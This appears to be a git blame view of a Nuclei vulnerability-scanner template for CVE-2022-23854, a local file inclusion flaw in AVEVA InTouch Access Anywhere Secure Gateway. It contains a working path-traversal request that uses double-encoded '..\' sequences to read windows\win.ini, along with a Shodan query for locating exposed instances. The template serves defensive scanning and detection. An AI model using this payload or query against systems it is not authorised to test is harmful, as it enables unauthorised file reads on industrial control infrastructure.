nuclei-templates/cves/2022/CVE-2022-23854.yaml

48 lines
1.4 KiB
YAML
Raw Normal View History

2022-09-12 08:32:07 +00:00
id: CVE-2022-23854
info:
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
2022-09-12 08:32:07 +00:00
author: For3stCo1d
severity: high
description: |
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
2022-09-12 08:32:07 +00:00
reference:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://www.aveva.com
2022-09-12 09:18:08 +00:00
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
2022-09-12 08:32:07 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-09-12 08:32:07 +00:00
cve-id: CVE-2022-23854
cwe-id: CWE-23
2022-09-12 08:32:07 +00:00
metadata:
shodan-query: http.html:"InTouch Access Anywhere"
verified: "true"
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
2022-09-12 08:32:07 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- 'extensions'
2022-09-12 10:45:12 +00:00
condition: and
2022-09-12 08:32:07 +00:00
- type: word
part: header
words:
- EricomSecureGateway
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15